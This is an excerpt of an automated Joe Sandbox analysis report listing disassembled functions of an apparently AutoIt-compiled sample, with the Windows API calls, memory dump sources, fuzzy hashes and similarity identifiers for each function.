                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: ac7bef8cfc7d5dc44dcf23e4149587ffdbb5cf6bbc335cc1a665f41fcbc2941a
                                                            • Instruction ID: 7c143e0d89f2d45a29e58e8f7973dbc4957904d874c32c5bdc868e43b85055bf
                                                            • Opcode Fuzzy Hash: ac7bef8cfc7d5dc44dcf23e4149587ffdbb5cf6bbc335cc1a665f41fcbc2941a
                                                            • Instruction Fuzzy Hash: 6C111335A01119AFCF14EFA8D8899EE77B8FF06301F100466EA11E7251D734AA918BA6
                                                            Function 00871652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008701FD,?,00871250,?,00008000), ref: 0087166F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,008701FD,?,00871250,?,00008000), ref: 00871694
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,008701FD,?,00871250,?,00008000), ref: 0087169E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,008701FD,?,00871250,?,00008000), ref: 008716D1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: ffe37f46069e11f29ad9589e6ad9c75fc79eea494a29fb26c87d9131cb4762a0
                                                            • Instruction ID: 9a4a1349a33bef8820c9995f85c9c19ba586817af68c8741934a8b7d74297761
                                                            • Opcode Fuzzy Hash: ffe37f46069e11f29ad9589e6ad9c75fc79eea494a29fb26c87d9131cb4762a0
                                                            • Instruction Fuzzy Hash: D6118231C0851DDBCF04AFA9D848AEEBB78FF19701F098056DA84F2244CB3095508BD6
                                                            Function 00847207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction ID: 262dd9f714cb7a34cba07c090ea6909347a7d0ae1c35577225b76b8412e36ceb
                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction Fuzzy Hash: DE01803204419EBBCF125E88CC018EE3F22FF19344B498615FA1998031C377C9B1AB81
                                                            Function 0089B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 0089B59E
                                                            • ScreenToClient.USER32(?,?), ref: 0089B5B6
                                                            • ScreenToClient.USER32(?,?), ref: 0089B5DA
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0089B5F5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: 1d497c7ccc76be84140547af9708e99498718886be4454088050ddb609b005af
                                                            • Instruction ID: 16620050bde535ed0762c267b077106ff606ff97be8a4571d2363fa80d2a34e0
                                                            • Opcode Fuzzy Hash: 1d497c7ccc76be84140547af9708e99498718886be4454088050ddb609b005af
                                                            • Instruction Fuzzy Hash: FE1146B5D00209EFDB41DF99D544AEEFBB5FB18310F144166E914E3220D735AA558F50
                                                            Function 0089B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 0089B8FE
                                                            • _memset.LIBCMT ref: 0089B90D
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,008D7F20,008D7F64), ref: 0089B93C
                                                            • CloseHandle.KERNEL32 ref: 0089B94E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3277943733-0
                                                            • Opcode ID: 16f877aaa029d71dd8d900623d12fc4bdacaa57a75c9870c87364dc7b74d6786
                                                            • Instruction ID: c34fd11fc8b1302d9393a262d949ffebac4624e50e7afe3385dff1fa66375a1f
                                                            • Opcode Fuzzy Hash: 16f877aaa029d71dd8d900623d12fc4bdacaa57a75c9870c87364dc7b74d6786
                                                            • Instruction Fuzzy Hash: CDF082B26453007BF2203775AC05FBB3B5CFB08354F440132BB08E5292EB754D0087A9
                                                            Function 00876E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00876E88
                                                              • Part of subcall function 0087794E: _memset.LIBCMT ref: 00877983
                                                            • _memmove.LIBCMT ref: 00876EAB
                                                            • _memset.LIBCMT ref: 00876EB8
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00876EC8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            • Opcode ID: 5f2ac90608c001463935d2ae628a44f8d5605abb74ce4c1636f4f87c1d0809d0
                                                            • Instruction ID: f9ef57edcb64176bfa4ec55b5741ec31471fa9ea4ee183c5d88eb9a5e078e308
                                                            • Opcode Fuzzy Hash: 5f2ac90608c001463935d2ae628a44f8d5605abb74ce4c1636f4f87c1d0809d0
                                                            • Instruction Fuzzy Hash: 99F0303A100200ABCF056F55DC85B4ABB29FF85321F08C061FE089E21BC735E911CBB5
                                                            Function 0089C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0081134D
                                                              • Part of subcall function 008112F3: SelectObject.GDI32(?,00000000), ref: 0081135C
                                                              • Part of subcall function 008112F3: BeginPath.GDI32(?), ref: 00811373
                                                              • Part of subcall function 008112F3: SelectObject.GDI32(?,00000000), ref: 0081139C
                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0089C030
                                                            • LineTo.GDI32(00000000,?,?), ref: 0089C03D
                                                            • EndPath.GDI32(00000000), ref: 0089C04D
                                                            • StrokePath.GDI32(00000000), ref: 0089C05B
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 1539411459-0
                                                            • Opcode ID: fc781368a5a05c2e6563102dc04a417ab365bca6c5c25b835559afe29f8bfff0
                                                            • Instruction ID: 3c4b4759e3a4f2e19bb9476f6a2335592f98ac289331c20a79061d617f135853
                                                            • Opcode Fuzzy Hash: fc781368a5a05c2e6563102dc04a417ab365bca6c5c25b835559afe29f8bfff0
                                                            • Instruction Fuzzy Hash: D9F05E31005659BBDB127F95AC0AFCE3F59BF05311F184112FB11A10E2C7755661DBD5
                                                            Function 0086A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0086A399
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0086A3AC
                                                            • GetCurrentThreadId.KERNEL32 ref: 0086A3B3
                                                            • AttachThreadInput.USER32(00000000), ref: 0086A3BA
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 2710830443-0
                                                            • Opcode ID: ffef7cde1c8d9b0854bb7f60f5ed5c5ee44a3e55cb11db5c6b513d724d14a7ee
                                                            • Instruction ID: 0e4a36651cbfeb9a0783ecb82ae0faef4f1718ef678405823fda869b3d0ac2a7
                                                            • Opcode Fuzzy Hash: ffef7cde1c8d9b0854bb7f60f5ed5c5ee44a3e55cb11db5c6b513d724d14a7ee
                                                            • Instruction Fuzzy Hash: 35E03972141328BADB252BA2DD0CEDB3F1CFF267A1F048026F609D4161C6718540CBA0
                                                            Function 00812218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00812231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 0081223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 00812250
                                                            • GetStockObject.GDI32(00000005), ref: 00812258
                                                            • GetWindowDC.USER32(?,00000000), ref: 0084C0D3
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0084C0E0
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0084C0F9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0084C112
                                                            • GetPixel.GDI32(00000000,?,?), ref: 0084C132
                                                            • ReleaseDC.USER32(?,00000000), ref: 0084C13D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: 62a593c52c4b2a879fb5b3b134869e53ca2af78e62893df72cf30c9aa51a5e42
                                                            • Instruction ID: 5eaa82936cc6ae40e4bfa405ae425463526a0ae803efba1726de8bc9885a6ef7
                                                            • Opcode Fuzzy Hash: 62a593c52c4b2a879fb5b3b134869e53ca2af78e62893df72cf30c9aa51a5e42
                                                            • Instruction Fuzzy Hash: 2FE0ED32604244EADB666F64FC0D7D87B14FB15336F188367FB69D80E287714990DB51
                                                            Function 00868C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 00868C63
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,0086882E), ref: 00868C6A
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0086882E), ref: 00868C77
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,0086882E), ref: 00868C7E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: 22e849ae70c27e01990a8487f5323af06ec12ddae9a9e2b0f5c763b6147a5dd8
                                                            • Instruction ID: 841c661f4b355819a9105424560cae1a32c44738648887853f25437a78fe357f
                                                            • Opcode Fuzzy Hash: 22e849ae70c27e01990a8487f5323af06ec12ddae9a9e2b0f5c763b6147a5dd8
                                                            • Instruction Fuzzy Hash: 62E02672602210DBD7202FB16D0CB463BACFF50792F0D4829B349D9081DB388441CB20
                                                            Function 00852187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00852187
                                                            • GetDC.USER32(00000000), ref: 00852191
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008521B1
                                                            • ReleaseDC.USER32(?), ref: 008521D2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 0a7d5bf38d9c03cd5b3eb877689c9c62843e3960bc1c8082e7a91d5fd986aec0
                                                            • Instruction ID: 6ad0534cf6c522196ec392ef20317ab833f2c08d332856bb85f9f0f1e3e12592
                                                            • Opcode Fuzzy Hash: 0a7d5bf38d9c03cd5b3eb877689c9c62843e3960bc1c8082e7a91d5fd986aec0
                                                            • Instruction Fuzzy Hash: 5DE0E575840718EFDB06AF64C808A9D7BB5FF5C351F248426FA5AD7261CB7891819F40
                                                            Function 0085219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 0085219B
                                                            • GetDC.USER32(00000000), ref: 008521A5
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 008521B1
                                                            • ReleaseDC.USER32(?), ref: 008521D2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 43d23bbe42e938e51e97944c6cf6e3f490bc3538f7e59a2a32983b4e99fc62d4
                                                            • Instruction ID: e9720b00422e75fc1c3d62233cbfbbfe05984e918d9ef4a114cf46fc6cfff79f
                                                            • Opcode Fuzzy Hash: 43d23bbe42e938e51e97944c6cf6e3f490bc3538f7e59a2a32983b4e99fc62d4
                                                            • Instruction Fuzzy Hash: DCE0E575800304AFCB06AF64C80869D7BA5FF5C310F248426FA5AD7261CB7891419F40
                                                            Function 0086B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 0086B981
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 3565006973-3941886329
                                                            • Opcode ID: 269808944361cd2624c69a71f05d21109ede7779b1b1c3cd36229c7e488cd77a
                                                            • Instruction ID: cf7c4e8c119144370b4fe7a09ef3f830212efbe9a2095e0341a0bf67a96c1b48
                                                            • Opcode Fuzzy Hash: 269808944361cd2624c69a71f05d21109ede7779b1b1c3cd36229c7e488cd77a
                                                            • Instruction Fuzzy Hash: A19149706002019FDB24DF68C885B6ABBF9FF48714F15856EE94ACB791EB70E881CB50
                                                            Function 0087B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0082FEC6: _wcscpy.LIBCMT ref: 0082FEE9
                                                              • Part of subcall function 00819997: __itow.LIBCMT ref: 008199C2
                                                              • Part of subcall function 00819997: __swprintf.LIBCMT ref: 00819A0C
                                                            • __wcsnicmp.LIBCMT ref: 0087B298
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0087B361
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: 56d517149ea095d68f347bfe7f8b5e5bf06081bc727e35fe5c79f6dc4dee9484
                                                            • Instruction ID: 5145d93f513172b7d75eb66e2c54fa64477fba4be23c344e0f721254aa35a82b
                                                            • Opcode Fuzzy Hash: 56d517149ea095d68f347bfe7f8b5e5bf06081bc727e35fe5c79f6dc4dee9484
                                                            • Instruction Fuzzy Hash: FB614C75A04219AFCB14DB98C895EAEB7B5FF08310F11806AF54AEB351DB70EE80CB51
                                                            Function 00822AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00822AC8
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00822AE1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemorySleepStatus
                                                            • String ID: @
                                                            • API String ID: 2783356886-2766056989
                                                            • Opcode ID: b3a4154883d2f6819673b72122f3b68b5a78dd4e79b3bdc2df9a28d4f025aee4
                                                            • Instruction ID: 162bcd119fd9e5b5ccc9122d03146e49efb180d96542ed7041f89901ff415f62
                                                            • Opcode Fuzzy Hash: b3a4154883d2f6819673b72122f3b68b5a78dd4e79b3bdc2df9a28d4f025aee4
                                                            • Instruction Fuzzy Hash: 2C514771418B449BD320AF54D896BABBBFCFF84310F42885DF2D9811A5DB308569CB67
                                                            Function 008799BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0081506B: __fread_nolock.LIBCMT ref: 00815089
                                                            • _wcscmp.LIBCMT ref: 00879AAE
                                                            • _wcscmp.LIBCMT ref: 00879AC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$__fread_nolock
                                                            • String ID: FILE
                                                            • API String ID: 4029003684-3121273764
                                                            • Opcode ID: d863e7e148fd8a10b64e0c294e02ff24869058191715272d49bbc83d120bb969
                                                            • Instruction ID: 5067ab8e3c5c5aec7e3d55f098fc02249dc87739ec485b2403f7bd212a8107f5
                                                            • Opcode Fuzzy Hash: d863e7e148fd8a10b64e0c294e02ff24869058191715272d49bbc83d120bb969
                                                            • Instruction Fuzzy Hash: 07412671A00A19BADF209AA4DC46FEFB7BDFF89710F004079F904E7181D675AA4487A2
